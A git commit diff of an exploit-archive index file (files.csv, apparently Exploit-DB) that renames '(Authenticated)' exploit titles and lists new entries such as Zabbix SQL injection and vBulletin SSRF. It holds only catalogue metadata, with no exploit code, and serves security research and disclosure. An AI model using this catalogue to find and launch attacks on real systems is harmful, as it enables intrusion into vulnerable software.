DB: 2016-09-10
3 new exploits freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated) freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow freeSSHd 1.2.1 - Authenticated Remote SEH Overflow Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service Serv-U 7.3 - (Authenticated) Remote FTP File Replacement Serv-U 7.3 - Authenticated (stou con:1) Denial of Service Serv-U 7.3 - Authenticated Remote FTP File Replacement freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC Hannon Hill Cascade Server - (Authenticated) Command Execution Hannon Hill Cascade Server - Authenticated Command Execution Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service NetAccess IP3 - (Authenticated) (ping option) Command Injection NetAccess IP3 - Authenticated (ping option) Command Injection Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting Apache Axis2 Administration console - Authenticated Cross-Site Scripting Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit) Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit) UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow ActFax Server FTP - (Authenticated) Remote Buffer Overflow ActFax Server FTP - Authenticated Remote Buffer Overflow Oracle Database - Protocol Authentication Bypass Oracle Database - Protocol Authentication Bypass IRIS Citations Management Tool - (Authenticated) Remote Command Execution IRIS Citations Management Tool - Authenticated Remote Command Execution Airmail 3.0.2 - Cross-Site Scripting LamaHub 0.0.6.2 - Buffer Overflow Vodafone Mobile Wifi - Reset Admin Password Zabbix 2.0 - 3.0.3 - SQL Injection Zabbix 2.0 < 3.0.3 - SQL Injection Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution Acuity CMS 2.6.2 - (ASP) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF) Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF) Alfresco - /proxy endpoint Parameter Server Side Request Forgery Alfresco - /cmisbrowser url Parameter Server Side Request Forgery vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF) vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery
This commit is contained in:
parent
0be1ea959a
commit
7607be84a3
5 changed files with 289 additions and 46 deletions
73
files.csv
73
files.csv
|
@ -5335,7 +5335,7 @@ id,file,description,date,author,platform,type,port
|
|||
5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'index.php mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
|
||||
5707,platforms/php/webapps/5707.txt,"Social Site Generator - (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0
|
||||
5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0
|
||||
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)",2008-05-31,securfrog,windows,dos,0
|
||||
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
|
||||
5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0
|
||||
5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
|
||||
5712,platforms/multiple/dos/5712.pl,"Samba (client) - receive_smb_raw() Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
|
||||
|
@ -5375,7 +5375,7 @@ id,file,description,date,author,platform,type,port
|
|||
5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0
|
||||
5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
|
||||
5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
|
||||
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
|
||||
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
|
||||
5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0
|
||||
5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0
|
||||
5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0
|
||||
|
@ -5709,7 +5709,7 @@ id,file,description,date,author,platform,type,port
|
|||
6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0
|
||||
6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
|
||||
6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0
|
||||
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
|
||||
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
|
||||
6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0
|
||||
6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
|
||||
6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0
|
||||
|
@ -5997,7 +5997,7 @@ id,file,description,date,author,platform,type,port
|
|||
6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0
|
||||
6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
|
||||
6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0
|
||||
6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
|
||||
6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
|
||||
6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0
|
||||
6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
|
||||
6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
|
||||
|
@ -6089,7 +6089,7 @@ id,file,description,date,author,platform,type,port
|
|||
6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0
|
||||
6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0
|
||||
6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0
|
||||
6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
|
||||
6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
|
||||
6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0
|
||||
6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0
|
||||
6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0
|
||||
|
@ -6232,8 +6232,8 @@ id,file,description,date,author,platform,type,port
|
|||
6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
|
||||
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
|
||||
6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Authenticated) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
|
||||
6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
|
||||
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0
|
||||
6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0
|
||||
|
@ -6368,18 +6368,18 @@ id,file,description,date,author,platform,type,port
|
|||
6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0
|
||||
6798,platforms/windows/local/6798.pl,"VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
|
||||
6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0
|
||||
6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
|
||||
6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
|
||||
6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0
|
||||
6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0
|
||||
6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0
|
||||
6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22
|
||||
6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
|
||||
6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0
|
||||
6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
|
||||
6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
|
||||
6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0
|
||||
6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0
|
||||
6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0
|
||||
6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
|
||||
6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
|
||||
6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0
|
||||
6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0
|
||||
6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
|
||||
|
@ -7759,7 +7759,7 @@ id,file,description,date,author,platform,type,port
|
|||
8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0
|
||||
8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0
|
||||
8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local,0
|
||||
8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Authenticated) Command Execution",2009-03-19,"Emory University",cgi,webapps,0
|
||||
8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0
|
||||
8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0
|
||||
8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0
|
||||
8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0
|
||||
|
@ -7785,7 +7785,7 @@ id,file,description,date,author,platform,type,port
|
|||
8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0
|
||||
8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0
|
||||
8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0
|
||||
8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
|
||||
8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
|
||||
8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0
|
||||
8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0
|
||||
8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0
|
||||
|
@ -7795,7 +7795,7 @@ id,file,description,date,author,platform,type,port
|
|||
8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0
|
||||
8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0
|
||||
8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0
|
||||
8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
|
||||
8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
|
||||
8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
|
||||
8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0
|
||||
8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0
|
||||
|
@ -8525,7 +8525,7 @@ id,file,description,date,author,platform,type,port
|
|||
9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0
|
||||
9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0
|
||||
9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0
|
||||
9039,platforms/multiple/remote/9039.txt,"Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
|
||||
9039,platforms/multiple/remote/9039.txt,"Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
|
||||
9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0
|
||||
9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0
|
||||
9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - (login grabber) Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0
|
||||
|
@ -8568,7 +8568,7 @@ id,file,description,date,author,platform,type,port
|
|||
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
|
||||
9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
|
||||
9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié ",windows,dos,0
|
||||
9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
|
||||
9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
|
||||
9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
|
||||
9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps,0
|
||||
9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0
|
||||
|
@ -9124,7 +9124,7 @@ id,file,description,date,author,platform,type,port
|
|||
9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0
|
||||
9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143
|
||||
9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0
|
||||
9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0
|
||||
9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0
|
||||
9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0
|
||||
9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash",2009-09-14,cloud,hardware,dos,0
|
||||
9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0
|
||||
|
@ -9146,7 +9146,7 @@ id,file,description,date,author,platform,type,port
|
|||
9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - (CreateStore) ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0
|
||||
9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 - (CUE) Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,windows,dos,0
|
||||
9687,platforms/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local,0
|
||||
9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Authenticated) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0
|
||||
9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - Authenticated (ping option) Command Injection",2009-09-15,r00t,hardware,local,0
|
||||
9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos,0
|
||||
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
|
||||
9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,windows,dos,0
|
||||
|
@ -10148,7 +10148,7 @@ id,file,description,date,author,platform,type,port
|
|||
11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps,0
|
||||
11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
|
||||
11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0
|
||||
11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0
|
||||
11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0
|
||||
11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0
|
||||
11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0
|
||||
11025,platforms/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps,0
|
||||
|
@ -11581,7 +11581,7 @@ id,file,description,date,author,platform,type,port
|
|||
12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
|
||||
12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0
|
||||
12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
|
||||
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
|
||||
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
|
||||
12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
|
||||
14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
|
@ -12649,10 +12649,10 @@ id,file,description,date,author,platform,type,port
|
|||
14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
|
||||
14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0
|
||||
14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0
|
||||
14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
